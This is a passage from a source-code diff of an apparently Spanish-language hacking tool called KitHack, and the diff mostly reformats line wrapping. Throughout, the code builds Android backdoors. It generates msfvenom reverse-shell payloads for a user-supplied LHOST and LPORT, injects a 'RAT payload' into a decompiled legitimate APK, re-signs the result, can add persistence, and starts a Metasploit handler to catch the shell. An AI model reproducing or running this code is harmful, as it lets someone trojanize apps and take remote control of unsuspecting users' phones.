) - ) + "\n{0}[X] An error has occured whilst generating the backdoor\n" + .format(RED)) time.sleep(3) - pause("{}Press any key to continue...".format(GREEN)) + pause( + "{}Press any key to continue...".format(GREEN)) os.system("systemctl stop postgresql && clear") main() elif m == "02": run_network() - LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) - LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) + LHOST = input("\n{0}SET LHOST: {1}".format( + YELLOW, DEFAULT)) + LPORT = input("\n{0}SET LPORT: {1}".format( + YELLOW, DEFAULT)) Tk().withdraw() APK = filedialog.askopenfilename( title="KITHACK - SELECT APK ORIGINAL", - filetypes=(("apk files", "*.apk"), ("all files", "*.*")), + filetypes=(("apk files", "*.apk"), ("all files", + "*.*")), ) print("\n{0}APK ORIGINAL: {1}".format(YELLOW, APK)) - OUT = input( - "\n{0}Output File Name: {1}".format(YELLOW, DEFAULT) - ) + OUT = input("\n{0}Output File Name: {1}".format( + YELLOW, DEFAULT)) mainout = os.path.splitext(OUT)[0] var = input( - "\n{0}[!] ¿Desea crear persistencia a su APK? (y/n)\n{1}KitHack >> {2}".format( - GREEN, RED, DEFAULT - ) - ) - print( - "\n{0}[*] Generating payload...{1}".format(GREEN, DEFAULT) - ) + "\n{0}[!] ¿Desea crear persistencia a su APK? (y/n)\n{1}KitHack >> {2}" + .format(GREEN, RED, DEFAULT)) + print("\n{0}[*] Generating payload...{1}".format( + GREEN, DEFAULT)) time.sleep(4) os.system( - "systemctl start postgresql && msfvenom -p android/shell/reverse_http LPORT={0} LHOST={1} R > output/payload.apk".format( - LPORT, LHOST - ) - ) + "systemctl start postgresql && msfvenom -p android/shell/reverse_http LPORT={0} LHOST={1} R > output/payload.apk" + .format(LPORT, LHOST)) location = os.getcwd() - print( - "{0}[*] Decompiling original APK...{1}".format( - GREEN, DEFAULT - ) - ) + print("{0}[*] Decompiling original APK...{1}".format( + GREEN, DEFAULT)) time.sleep(4) os.system( - "cp {0} {1}/output/original.apk && apktool d -f -o output/original output/original.apk".format( - APK, location - ) - ) - print( - "\n{0}[*] Decompiling payload APK...{1}".format( - GREEN, DEFAULT - ) - ) + "cp {0} {1}/output/original.apk && apktool d -f -o output/original output/original.apk" + .format(APK, location)) + print("\n{0}[*] Decompiling payload APK...{1}".format( + GREEN, DEFAULT)) time.sleep(4) - os.system("apktool d -f -o output/payload output/payload.apk") - print( - "\n{0}[*] Configuring RAT Payload...{1}".format( - GREEN, DEFAULT - ) + os.system( + "apktool d -f -o output/payload output/payload.apk" ) + print("\n{0}[*] Configuring RAT Payload...{1}".format( + GREEN, DEFAULT)) time.sleep(4) subprocess.Popen(["bash", "-c", ". lib/apkf.sh; rat"]) - print("\n{0}[*] Compiling RAT APK...{1}".format(GREEN, DEFAULT)) + print("\n{0}[*] Compiling RAT APK...{1}".format( + GREEN, DEFAULT)) time.sleep(4) - os.system("apktool b output/original -o output/kithack.apk") + os.system( + "apktool b output/original -o output/kithack.apk") if os.path.isfile("output/kithack.apk"): - print("\n{0}[*] Signing APK...{1}".format(GREEN, DEFAULT)) + print("\n{0}[*] Signing APK...{1}".format( + GREEN, DEFAULT)) time.sleep(4) os.system( "jarsigner -keystore certificate.keystore -storepass android -keypass android -digestalg SHA1 -sigalg MD5withRSA output/kithack.apk android" ) time.sleep(4) os.system( - "zipalign 4 output/kithack.apk output/{0}.apk".format( - mainout - ) - ) + "zipalign 4 output/kithack.apk output/{0}.apk". + format(mainout)) while var.upper() != "N": print( - "\n{0}[*] Generating persistence file...{1}".format( - GREEN, DEFAULT - ) - ) + "\n{0}[*] Generating persistence file...{1}" + .format(GREEN, DEFAULT)) time.sleep(4) ext = mainout + ".apk" - subprocess.Popen( - ["bash", "-c", ". lib/apkf.sh; pers output/" + ext] - ) - print( - "{0}File: {1}/output/{2}.sh".format( - DEFAULT, location, mainout - ) - ) + subprocess.Popen([ + "bash", "-c", + ". lib/apkf.sh; pers output/" + ext + ]) + print("{0}File: {1}/output/{2}.sh".format( + DEFAULT, location, mainout)) break - print( - "\n{0}[*] Deleting temporary files...{1}".format( - GREEN, DEFAULT - ) - ) + print("\n{0}[*] Deleting temporary files...{1}". + format(GREEN, DEFAULT)) time.sleep(4) os.system( "rm -rf output/original output/payload output/original.apk output/payload.apk output/kithack.apk" ) print( - "\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.apk".format( - GREEN, DEFAULT, location, mainout - ) - ) - if ( - input( - "\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format( - GREEN, RED, DEFAULT - ) - ).upper() - != "Y" - ): + "\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.apk" + .format(GREEN, DEFAULT, location, mainout)) + if (input( + "\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}" + .format(GREEN, RED, DEFAULT)).upper() != + "Y"): os.system("systemctl stop postgresql && clear") main() else: if not ".tcp.ngrok.io" in LHOST: os.system( - 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD android/shell/reverse_http; exploit\'"'.format( - LHOST, LPORT - ) - ) - pause( - "\n{}Press any key to continue...".format(GREEN) - ) - os.system("systemctl stop postgresql && clear") + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD android/shell/reverse_http; exploit\'"' + .format(LHOST, LPORT)) + pause("\n{}Press any key to continue...". + format(GREEN)) + os.system( + "systemctl stop postgresql && clear") main() else: os.system( 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD android/shell/reverse_http; exploit\'"' ) - pause( - "\n{}Press any key to continue...".format(GREEN) - ) - os.system("systemctl stop postgresql && clear") + pause("\n{}Press any key to continue...". + format(GREEN)) + os.system( + "systemctl stop postgresql && clear") main() else: print( - "\n{0}[X] An error has occured whilst generating the backdoor\n".format( - RED - ) - ) + "\n{0}[X] An error has occured whilst generating the backdoor\n" + .format(RED)) time.sleep(3) os.system( "rm -rf output/original output/payload output/original.apk output/payload.apk output/kithack.apk" ) - pause("{}Press any key to continue...".format(GREEN)) + pause( + "{}Press any key to continue...".format(GREEN)) os.system("systemctl stop postgresql && clear") main() @@ -5439,471 +4476,393 @@ def main(): if a == "01": run_network() - LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) - LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) - while ( - input( - "\n{0}[!] ¿Desea modificar el nombre/icono predeterminados? (y/n)\n{1}KitHack >> {2}".format( - GREEN, RED, DEFAULT - ) - ).upper() - != "Y" - ): + LHOST = input("\n{0}SET LHOST: {1}".format( + YELLOW, DEFAULT)) + LPORT = input("\n{0}SET LPORT: {1}".format( + YELLOW, DEFAULT)) + while (input( + "\n{0}[!] ¿Desea modificar el nombre/icono predeterminados? (y/n)\n{1}KitHack >> {2}" + .format(GREEN, RED, DEFAULT)).upper() != "Y"): break else: Tk().withdraw() icon = filedialog.askopenfilename( title="KITHACK - SELECT ICON PNG", - filetypes=(("png files", "*.png"), ("all files", "*.*")), + filetypes=(("png files", "*.png"), ("all files", + "*.*")), ) print("\n{0}ICON: {1}".format(YELLOW, icon)) - OUT = input( - "\n{0}Output File Name: {1}".format(YELLOW, DEFAULT) - ) + OUT = input("\n{0}Output File Name: {1}".format( + YELLOW, DEFAULT)) mainout = os.path.splitext(OUT)[0] var = input( - "\n{0}[!] ¿Desea crear persistencia a su APK? (y/n)\n{1}KitHack >> {2}".format( - GREEN, RED, DEFAULT - ) - ) + "\n{0}[!] ¿Desea crear persistencia a su APK? (y/n)\n{1}KitHack >> {2}" + .format(GREEN, RED, DEFAULT)) file = open("/tmp/data.txt", "w") file.write(icon + "\n") file.write(mainout) file.close() - print( - "\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT) - ) + print("\n{0}[*] Generating backdoor...{1}".format( + GREEN, DEFAULT)) time.sleep(4) os.system( - "systemctl start postgresql && msfvenom -p android/shell/reverse_https LHOST={0} LPORT={1} R > output/payload.apk".format( - LHOST, LPORT - ) - ) - print("{0}[*] Decompiling APK...{1}".format(GREEN, DEFAULT)) + "systemctl start postgresql && msfvenom -p android/shell/reverse_https LHOST={0} LPORT={1} R > output/payload.apk" + .format(LHOST, LPORT)) + print("{0}[*] Decompiling APK...{1}".format( + GREEN, DEFAULT)) time.sleep(4) - os.system("apktool d -f -o output/payload output/payload.apk") - print( - "\n{0}[*] Configuring icon change...{1}".format( - GREEN, DEFAULT - ) + os.system( + "apktool d -f -o output/payload output/payload.apk" ) + print("\n{0}[*] Configuring icon change...{1}".format( + GREEN, DEFAULT)) time.sleep(4) subprocess.Popen(["bash", "-c", ". lib/apkf.sh; icon"]) - print("\n{0}[*] Compiling RAT APK...{1}".format(GREEN, DEFAULT)) + print("\n{0}[*] Compiling RAT APK...{1}".format( + GREEN, DEFAULT)) time.sleep(4) - os.system("apktool b output/payload -o output/kithack.apk") + os.system( + "apktool b output/payload -o output/kithack.apk") location = os.getcwd() if os.path.isfile("output/kithack.apk"): - print("\n{0}[*] Signing APK...{1}".format(GREEN, DEFAULT)) + print("\n{0}[*] Signing APK...{1}".format( + GREEN, DEFAULT)) time.sleep(4) os.system( "jarsigner -keystore certificate.keystore -storepass android -keypass android -digestalg SHA1 -sigalg MD5withRSA output/kithack.apk android" ) time.sleep(4) os.system( - "zipalign 4 output/kithack.apk output/{0}.apk".format( - mainout - ) - ) + "zipalign 4 output/kithack.apk output/{0}.apk". + format(mainout)) while var.upper() != "N": print( - "\n{0}[*] Generating persistence file...{1}".format( - GREEN, DEFAULT - ) - ) + "\n{0}[*] Generating persistence file...{1}" + .format(GREEN, DEFAULT)) time.sleep(4) ext = mainout + ".apk" - subprocess.Popen( - ["bash", "-c", ". lib/apkf.sh; pers output/" + ext] - ) - print( - "{0}File: {1}/output/{2}.sh".format( - DEFAULT, location, mainout - ) - ) + subprocess.Popen([ + "bash", "-c", + ". lib/apkf.sh; pers output/" + ext + ]) + print("{0}File: {1}/output/{2}.sh".format( + DEFAULT, location, mainout)) break - print( - "\n{0}[*] Deleting temporary files...{1}".format( - GREEN, DEFAULT - ) - ) + print("\n{0}[*] Deleting temporary files...{1}". + format(GREEN, DEFAULT)) time.sleep(4) os.system( "rm -rf output/payload output/payload.apk output/kithack.apk" ) print( - "\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.apk".format( - GREEN, DEFAULT, location, mainout - ) - ) - if ( - input( - "\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format( - GREEN, RED, DEFAULT - ) - ).upper() - != "Y" - ): + "\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.apk" + .format(GREEN, DEFAULT, location, mainout)) + if (input( + "\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}" + .format(GREEN, RED, DEFAULT)).upper() != + "Y"): os.system("systemctl stop postgresql && clear") main() else: if not ".tcp.ngrok.io" in LHOST: os.system( - 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD android/shell/reverse_https; exploit\'"'.format( - LHOST, LPORT - ) - ) - pause( - "\n{}Press any key to continue...".format(GREEN) - ) - os.system("systemctl stop postgresql && clear") + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD android/shell/reverse_https; exploit\'"' + .format(LHOST, LPORT)) + pause("\n{}Press any key to continue...". + format(GREEN)) + os.system( + "systemctl stop postgresql && clear") main() else: os.system( 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD android/shell/reverse_https; exploit\'"' ) - pause( - "\n{}Press any key to continue...".format(GREEN) - ) - os.system("systemctl stop postgresql && clear") + pause("\n{}Press any key to continue...". + format(GREEN)) + os.system( + "systemctl stop postgresql && clear") main() else: print( - "\n{0}[X] An error has occured whilst generating the backdoor\n".format( - RED - ) - ) + "\n{0}[X] An error has occured whilst generating the backdoor\n" + .format(RED)) time.sleep(3) os.system( "rm -rf output/payload output/payload.apk output/kithack.apk" ) - pause("{}Press any key to continue...".format(GREEN)) + pause( + "{}Press any key to continue...".format(GREEN)) os.system("systemctl stop postgresql && clear") main() # Salida de bucle - OUT = input("\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) + OUT = input("\n{0}Output File Name: {1}".format( + YELLOW, DEFAULT)) mainout = os.path.splitext(OUT)[0] var = input( - "\n{0}[!] ¿Desea crear persistencia a su APK? (y/n)\n{1}KitHack >> {2}".format( - GREEN, RED, DEFAULT - ) - ) - print("\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) + "\n{0}[!] ¿Desea crear persistencia a su APK? (y/n)\n{1}KitHack >> {2}" + .format(GREEN, RED, DEFAULT)) + print("\n{0}[*] Generating backdoor...{1}".format( + GREEN, DEFAULT)) time.sleep(4) os.system( - "systemctl start postgresql && msfvenom -p android/shell/reverse_https LHOST={0} LPORT={1} R > output/{2}.apk".format( - LHOST, LPORT, mainout - ) - ) + "systemctl start postgresql && msfvenom -p android/shell/reverse_https LHOST={0} LPORT={1} R > output/{2}.apk" + .format(LHOST, LPORT, mainout)) location = os.getcwd() if os.stat("output/{}.apk".format(mainout)).st_size != 0: while var.upper() != "N": - print( - "\n{0}[*] Generating persistence file...{1}".format( - GREEN, DEFAULT - ) - ) + print("\n{0}[*] Generating persistence file...{1}". + format(GREEN, DEFAULT)) time.sleep(4) ext = mainout + ".apk" - subprocess.Popen( - ["bash", "-c", ". lib/apkf.sh; pers output/" + ext] - ) - print( - "{0}File: {1}/output/{2}.sh".format( - DEFAULT, location, mainout - ) - ) + subprocess.Popen([ + "bash", "-c", + ". lib/apkf.sh; pers output/" + ext + ]) + print("{0}File: {1}/output/{2}.sh".format( + DEFAULT, location, mainout)) break print( - "\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.apk".format( - GREEN, DEFAULT, location, mainout - ) - ) - if ( - input( - "\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format( - GREEN, RED, DEFAULT - ) - ).upper() - != "Y" - ): + "\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.apk". + format(GREEN, DEFAULT, location, mainout)) + if (input( + "\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}" + .format(GREEN, RED, DEFAULT)).upper() != "Y"): os.system("systemctl stop postgresql && clear") main() else: if not ".tcp.ngrok.io" in LHOST: os.system( - 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD android/shell/reverse_https; exploit\'"'.format( - LHOST, LPORT - ) - ) - pause("\n{}Press any key to continue...".format(GREEN)) + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD android/shell/reverse_https; exploit\'"' + .format(LHOST, LPORT)) + pause( + "\n{}Press any key to continue...".format( + GREEN)) os.system("systemctl stop postgresql && clear") main() else: os.system( 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD android/shell/reverse_https; exploit\'"' ) - pause("\n{}Press any key to continue...".format(GREEN)) + pause( + "\n{}Press any key to continue...".format( + GREEN)) os.system("systemctl stop postgresql && clear") main() else: print( - "\n{0}[X] An error has occured whilst generating the backdoor\n".format( - RED - ) - ) + "\n{0}[X] An error has occured whilst generating the backdoor\n" + .format(RED)) time.sleep(3) pause("{}Press any key to continue...".format(GREEN)) os.system("systemctl stop postgresql && clear") main() elif a == "02": - print("{0}\n [*] {1}Select Method:\n".format(DEFAULT, GREEN)) - print( - "{0}[01]{1} Use the old Metasploit method".format(WHITE, YELLOW) - ) - print("{0}[02]{1} Use the new KitHack method".format(WHITE, YELLOW)) + print("{0}\n [*] {1}Select Method:\n".format( + DEFAULT, GREEN)) + print("{0}[01]{1} Use the old Metasploit method".format( + WHITE, YELLOW)) + print("{0}[02]{1} Use the new KitHack method".format( + WHITE, YELLOW)) m = input("{0}KitHack >> {1}".format(RED, DEFAULT)) m = m.zfill(2) if m == "01": run_network() - LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) - LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) + LHOST = input("\n{0}SET LHOST: {1}".format( + YELLOW, DEFAULT)) + LPORT = input("\n{0}SET LPORT: {1}".format( + YELLOW, DEFAULT)) Tk().withdraw() APK = filedialog.askopenfilename( title="KITHACK - SELECT APK ORIGINAL", - filetypes=(("apk files", "*.apk"), ("all files", "*.*")), + filetypes=(("apk files", "*.apk"), ("all files", + "*.*")), ) print("\n{0}APK ORIGINAL: {1}".format(YELLOW, APK)) - OUT = input( - "\n{0}Output File Name: {1}".format(YELLOW, DEFAULT) - ) + OUT = input("\n{0}Output File Name: {1}".format( + YELLOW, DEFAULT)) mainout = os.path.splitext(OUT)[0] var = input( - "\n{0}[!] ¿Desea crear persistencia a su APK? (y/n)\n{1}KitHack >> {2}".format( - GREEN, RED, DEFAULT - ) - ) - print( - "\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT) - ) + "\n{0}[!] ¿Desea crear persistencia a su APK? (y/n)\n{1}KitHack >> {2}" + .format(GREEN, RED, DEFAULT)) + print("\n{0}[*] Generating backdoor...{1}".format( + GREEN, DEFAULT)) time.sleep(4) os.system( - "systemctl start postgresql && msfvenom -x {0} -p android/shell/reverse_https LHOST={1} LPORT={2} > output/{3}.apk".format( - APK, LHOST, LPORT, mainout - ) - ) + "systemctl start postgresql && msfvenom -x {0} -p android/shell/reverse_https LHOST={1} LPORT={2} > output/{3}.apk" + .format(APK, LHOST, LPORT, mainout)) location = os.getcwd() - if os.stat("output/{}.apk".format(mainout)).st_size != 0: + if os.stat( + "output/{}.apk".format(mainout)).st_size != 0: while var.upper() != "N": print( - "\n{0}[*] Generating persistence file...{1}".format( - GREEN, DEFAULT - ) - ) + "\n{0}[*] Generating persistence file...{1}" + .format(GREEN, DEFAULT)) time.sleep(4) ext = mainout + ".apk" - subprocess.Popen( - ["bash", "-c", ". lib/apkf.sh; pers output/" + ext] - ) - print( - "{0}File: {1}/output/{2}.sh".format( - DEFAULT, location, mainout - ) - ) + subprocess.Popen([ + "bash", "-c", + ". lib/apkf.sh; pers output/" + ext + ]) + print("{0}File: {1}/output/{2}.sh".format( + DEFAULT, location, mainout)) break print( - "\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.apk".format( - GREEN, DEFAULT, location, mainout - ) - ) - if ( - input( - "\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format( - GREEN, RED, DEFAULT - ) - ).upper() - != "Y" - ): + "\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.apk" + .format(GREEN, DEFAULT, location, mainout)) + if (input( + "\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}" + .format(GREEN, RED, DEFAULT)).upper() != + "Y"): os.system("systemctl stop postgresql && clear") main() else: if not ".tcp.ngrok.io" in LHOST: os.system( - 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD android/shell/reverse_https; exploit\'"'.format( - LHOST, LPORT - ) - ) - pause( - "\n{}Press any key to continue...".format(GREEN) - ) - os.system("systemctl stop postgresql && clear") + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD android/shell/reverse_https; exploit\'"' + .format(LHOST, LPORT)) + pause("\n{}Press any key to continue...". + format(GREEN)) + os.system( + "systemctl stop postgresql && clear") main() else: os.system( 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD android/shell/reverse_https; exploit\'"' ) - pause( - "\n{}Press any key to continue...".format(GREEN) - ) - os.system("systemctl stop postgresql && clear") + pause("\n{}Press any key to continue...". + format(GREEN)) + os.system( + "systemctl stop postgresql && clear") main() else: print( - "\n{0}[X] An error has occured whilst generating the backdoor\n".format( - RED - ) - ) + "\n{0}[X] An error has occured whilst generating the backdoor\n" + .format(RED)) time.sleep(3) - pause("{}Press any key to continue...".format(GREEN)) + pause( + "{}Press any key to continue...".format(GREEN)) os.system("systemctl stop postgresql && clear") main() elif m == "02": run_network() - LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) - LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) + LHOST = input("\n{0}SET LHOST: {1}".format( + YELLOW, DEFAULT)) + LPORT = input("\n{0}SET LPORT: {1}".format( + YELLOW, DEFAULT)) Tk().withdraw() APK = filedialog.askopenfilename( title="KITHACK - SELECT APK ORIGINAL", - filetypes=(("apk files", "*.apk"), ("all files", "*.*")), + filetypes=(("apk files", "*.apk"), ("all files", + "*.*")), ) print("\n{0}APK ORIGINAL: {1}".format(YELLOW, APK)) - OUT = input( - "\n{0}Output File Name: {1}".format(YELLOW, DEFAULT) - ) + OUT = input("\n{0}Output File Name: {1}".format( + YELLOW, DEFAULT)) mainout = os.path.splitext(OUT)[0] var = input( - "\n{0}[!] ¿Desea crear persistencia a su APK? (y/n)\n{1}KitHack >> {2}".format( - GREEN, RED, DEFAULT - ) - ) - print( - "\n{0}[*] Generating payload...{1}".format(GREEN, DEFAULT) - ) + "\n{0}[!] ¿Desea crear persistencia a su APK? (y/n)\n{1}KitHack >> {2}" + .format(GREEN, RED, DEFAULT)) + print("\n{0}[*] Generating payload...{1}".format( + GREEN, DEFAULT)) time.sleep(4) os.system( - "systemctl start postgresql && msfvenom -p android/shell/reverse_https LPORT={0} LHOST={1} R > output/payload.apk".format( - LPORT, LHOST - ) - ) + "systemctl start postgresql && msfvenom -p android/shell/reverse_https LPORT={0} LHOST={1} R > output/payload.apk" + .format(LPORT, LHOST)) location = os.getcwd() - print( - "{0}[*] Decompiling original APK...{1}".format( - GREEN, DEFAULT - ) - ) + print("{0}[*] Decompiling original APK...{1}".format( + GREEN, DEFAULT)) time.sleep(4) os.system( - "cp {0} {1}/output/original.apk && apktool d -f -o output/original output/original.apk".format( - APK, location - ) - ) - print( - "\n{0}[*] Decompiling payload APK...{1}".format( - GREEN, DEFAULT - ) - ) + "cp {0} {1}/output/original.apk && apktool d -f -o output/original output/original.apk" + .format(APK, location)) + print("\n{0}[*] Decompiling payload APK...{1}".format( + GREEN, DEFAULT)) time.sleep(4) - os.system("apktool d -f -o output/payload output/payload.apk") - print( - "\n{0}[*] Configuring RAT Payload...{1}".format( - GREEN, DEFAULT - ) + os.system( + "apktool d -f -o output/payload output/payload.apk" ) + print("\n{0}[*] Configuring RAT Payload...{1}".format( + GREEN, DEFAULT)) time.sleep(4) subprocess.Popen(["bash", "-c", ". lib/apkf.sh; rat"]) - print("\n{0}[*] Compiling RAT APK...{1}".format(GREEN, DEFAULT)) + print("\n{0}[*] Compiling RAT APK...{1}".format( + GREEN, DEFAULT)) time.sleep(4) - os.system("apktool b output/original -o output/kithack.apk") + os.system( + "apktool b output/original -o output/kithack.apk") if os.path.isfile("output/kithack.apk"): - print("\n{0}[*] Signing APK...{1}".format(GREEN, DEFAULT)) + print("\n{0}[*] Signing APK...{1}".format( + GREEN, DEFAULT)) time.sleep(4) os.system( "jarsigner -keystore certificate.keystore -storepass android -keypass android -digestalg SHA1 -sigalg MD5withRSA output/kithack.apk android" ) time.sleep(4) os.system( - "zipalign 4 output/kithack.apk output/{0}.apk".format( - mainout - ) - ) + "zipalign 4 output/kithack.apk output/{0}.apk". + format(mainout)) while var.upper() != "N": print( - "\n{0}[*] Generating persistence file...{1}".format( - GREEN, DEFAULT - ) - ) + "\n{0}[*] Generating persistence file...{1}" + .format(GREEN, DEFAULT)) time.sleep(4) ext = mainout + ".apk" - subprocess.Popen( - ["bash", "-c", ". lib/apkf.sh; pers output/" + ext] - ) - print( - "{0}File: {1}/output/{2}.sh".format( - DEFAULT, location, mainout - ) - ) + subprocess.Popen([ + "bash", "-c", + ". lib/apkf.sh; pers output/" + ext + ]) + print("{0}File: {1}/output/{2}.sh".format( + DEFAULT, location, mainout)) break - print( - "\n{0}[*] Deleting temporary files...{1}".format( - GREEN, DEFAULT - ) - ) + print("\n{0}[*] Deleting temporary files...{1}". + format(GREEN, DEFAULT)) time.sleep(4) os.system( "rm -rf output/original output/payload output/original.apk output/payload.apk output/kithack.apk" ) print( - "\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.apk".format( - GREEN, DEFAULT, location, mainout - ) - ) - if ( - input( - "\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format( - GREEN, RED, DEFAULT - ) - ).upper() - != "Y" - ): + "\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.apk" + .format(GREEN, DEFAULT, location, mainout)) + if (input( + "\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}" + .format(GREEN, RED, DEFAULT)).upper() != + "Y"): os.system("systemctl stop postgresql && clear") main() else: if not ".tcp.ngrok.io" in LHOST: os.system( - 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD android/shell/reverse_https; exploit\'"'.format( - LHOST, LPORT - ) - ) - pause( - "\n{}Press any key to continue...".format(GREEN) - ) - os.system("systemctl stop postgresql && clear") + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD android/shell/reverse_https; exploit\'"' + .format(LHOST, LPORT)) + pause("\n{}Press any key to continue...". + format(GREEN)) + os.system( + "systemctl stop postgresql && clear") main() else: os.system( 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD android/shell/reverse_https; exploit\'"' ) - pause( - "\n{}Press any key to continue...".format(GREEN) - ) - os.system("systemctl stop postgresql && clear") + pause("\n{}Press any key to continue...". + format(GREEN)) + os.system( + "systemctl stop postgresql && clear") main() else: print( - "\n{0}[X] An error has occured whilst generating the backdoor\n".format( - RED - ) - ) + "\n{0}[X] An error has occured whilst generating the backdoor\n" + .format(RED)) time.sleep(3) os.system( "rm -rf output/original output/payload output/original.apk output/payload.apk output/kithack.apk" ) - pause("{}Press any key to continue...".format(GREEN)) + pause( + "{}Press any key to continue...".format(GREEN)) os.system("systemctl stop postgresql && clear") main() @@ -5931,471 +4890,393 @@ def main(): if a == "01": run_network() - LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) - LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) - while ( - input( - "\n{0}[!] ¿Desea modificar el nombre/icono predeterminados? (y/n)\n{1}KitHack >> {2}".format( - GREEN, RED, DEFAULT - ) - ).upper() - != "Y" - ): + LHOST = input("\n{0}SET LHOST: {1}".format( + YELLOW, DEFAULT)) + LPORT = input("\n{0}SET LPORT: {1}".format( + YELLOW, DEFAULT)) + while (input( + "\n{0}[!] ¿Desea modificar el nombre/icono predeterminados? (y/n)\n{1}KitHack >> {2}" + .format(GREEN, RED, DEFAULT)).upper() != "Y"): break else: Tk().withdraw() icon = filedialog.askopenfilename( title="KITHACK - SELECT ICON PNG", - filetypes=(("png files", "*.png"), ("all files", "*.*")), + filetypes=(("png files", "*.png"), ("all files", + "*.*")), ) print("\n{0}ICON: {1}".format(YELLOW, icon)) - OUT = input( - "\n{0}Output File Name: {1}".format(YELLOW, DEFAULT) - ) + OUT = input("\n{0}Output File Name: {1}".format( + YELLOW, DEFAULT)) mainout = os.path.splitext(OUT)[0] var = input( - "\n{0}[!] ¿Desea crear persistencia a su APK? (y/n)\n{1}KitHack >> {2}".format( - GREEN, RED, DEFAULT - ) - ) + "\n{0}[!] ¿Desea crear persistencia a su APK? (y/n)\n{1}KitHack >> {2}" + .format(GREEN, RED, DEFAULT)) file = open("/tmp/data.txt", "w") file.write(icon + "\n") file.write(mainout) file.close() - print( - "\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT) - ) + print("\n{0}[*] Generating backdoor...{1}".format( + GREEN, DEFAULT)) time.sleep(4) os.system( - "systemctl start postgresql && msfvenom -p android/shell/reverse_tcp LHOST={0} LPORT={1} R > output/payload.apk".format( - LHOST, LPORT - ) - ) - print("{0}[*] Decompiling APK...{1}".format(GREEN, DEFAULT)) + "systemctl start postgresql && msfvenom -p android/shell/reverse_tcp LHOST={0} LPORT={1} R > output/payload.apk" + .format(LHOST, LPORT)) + print("{0}[*] Decompiling APK...{1}".format( + GREEN, DEFAULT)) time.sleep(4) - os.system("apktool d -f -o 